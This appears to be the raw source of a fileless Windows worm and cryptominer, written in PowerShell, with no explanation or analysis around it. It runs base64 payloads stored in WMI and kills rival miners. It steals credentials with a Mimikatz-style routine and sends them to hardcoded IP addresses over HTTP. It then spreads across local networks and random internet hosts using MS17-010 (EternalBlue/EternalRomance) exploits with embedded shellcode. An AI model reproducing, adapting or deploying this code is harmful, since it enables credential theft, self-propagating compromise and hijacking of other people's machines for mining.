$stime=[Environment]::TickCount $funs = ([wmclass] 'root\default:Win32_Services').Properties['funs'].Value $defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)) iex $defun Get-wmiobjects __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'DSM Event'} |Remove-wmiobjects $dirpath=$env:SystemRoot+'\system32' if (!(test-path $dirpath )){ $dirpath=$env:SystemRoot } if (!(test-path ($dirpath+'\msvcp120.dll'))) {sentfile ($dirpath+'\msvcp120.dll') 'vcp'} if (!(test-path ($dirpath+'\msvcr120.dll'))) {sentfile ($dirpath+'\msvcr120.dll') 'vcr'} [array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id} $tcpconn = netstat -anop tcp $exist=$False if ($psids -ne $null ) { foreach ($t in $tcpconn) { $line =$t.split(' ')| ?{$_} if ($line -eq $null) {continue} if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) ) { $exist=$true break } } } foreach ($t in $tcpconn) { $line =$t.split(' ')| ?{$_} if (!($line -is [array])){continue} if (($line[-3].contains(":3333") -or $line[-3].contains(":5555")-or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED")) { $evid=$line[-1] Get-Process -id $evid | stop-process -force } } if (!$exist -and ($psids.count -le 8)) { $cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([wmclass] 'root\default:Win32_Services').Properties['mon'].Value;`$funs = ([wmclass] 'root\default:Win32_Services').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`"" $vbs = New-Object -ComObject WScript.Shell $vbs.run($cmdmon,0) } $NTLM=$False $mimi = ([wmclass] 'root\default:Win32_Services').Properties['mimi'].Value $a, $NTLM= Get-creds $mimi $mimi $Networkss = Get-wmiobjects Win32_NetworksAdapterConfiguration -EA Stop | ? {$_.IPEnabled} $ipsu = ([wmclass] 'root\default:Win32_Services').Properties['ipsu'].Value $i17 = ([wmclass] 'root\default:Win32_Services').Properties['i17'].Value $scba= ([wmclass] 'root\default:Win32_Services').Properties['sc'].Value [byte[]]$sc=[System.Convert]::FromBase64String($scba) $se=@('195.22.127.157', '93.174.93.73') $nic='195.22.127.157' foreach($t in $se) { $pin=test-connection $t if ($pin -ne $null) { $nic=$t break } } $nic=$nic+":8000" if ($a.count -ne 0) { foreach($aa in $a){ $data = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aa)) (New-Object Net.WebClient).DownloadString("http://$nic/api.php?data=" + $data) } } foreach ($Networks in $Networkss) { $IPAddress = $Networks.IpAddress[0] if ($IPAddress -match '^169.254') { continue } $SubnetMask = $Networks.IPSubnet[0] $ips=Get-NetworksRange $IPAddress $SubnetMask $tcpconn = netstat -anop tcp foreach ($t in $tcpconn) { $line =$t.split(' ')| ?{$_} if (!($line -is [array])){ continue } if ($line.count -le 4){ continue } $i=$line[-3].split(':')[0] if (($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains $i)) { $ips+=$i } } if (([Environment]::TickCount-$stime)/1000 -gt 5400){break} foreach ($ip in $ips) { if (([Environment]::TickCount-$stime)/1000 -gt 5400){break} if ($ip -eq $IPAddress){continue} if ((Test-Connection $ip -count 1) -ne $null -and $ipsu -notcontains $ip) { $re=0 if ($a.count -ne 0) { $re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM } if ($re -eq 1) { $ipsu = $ipsu + " " + $ip } else { $vul=[PingCastle.Scanners.m17sc]::Scan($ip) if ($vul -and $i17 -notcontains $ip) { $res = eb7 $ip $sc if ($res -ne $true) { eb8 $ip $sc } $i17 = $i17 + " " + $ip } } } } } $StaticClass=New-Object Management.ManagementClass('root\default:Win32_Services') $StaticClass.SetPropertyValue('ipsu' ,$ipsu) $StaticClass.Put() $StaticClass.SetPropertyValue('i17' ,$i17) $StaticClass.Put() $t=test-connection 9.9.9.9 -Verbose -Count 2 if($t){ [System.Threading.Mutex]$thread_mutex; [bool]$result = $false; $thread_mutex = New-Object System.Threading.Mutex($true, "MMLOLSacnner", [ref] $result); if(!$result){ exit; } while($true){ $ip=[IPAddress]::Parse([String] (Get-Random)).IPAddressToString $vul=[PingCastle.Scanners.m17sc]::Scan($ip) if ($vul) { $res = eb7 $ip $sc if ($res -ne $true) { eb8 $ip $sc } } Start-Sleep 5 } }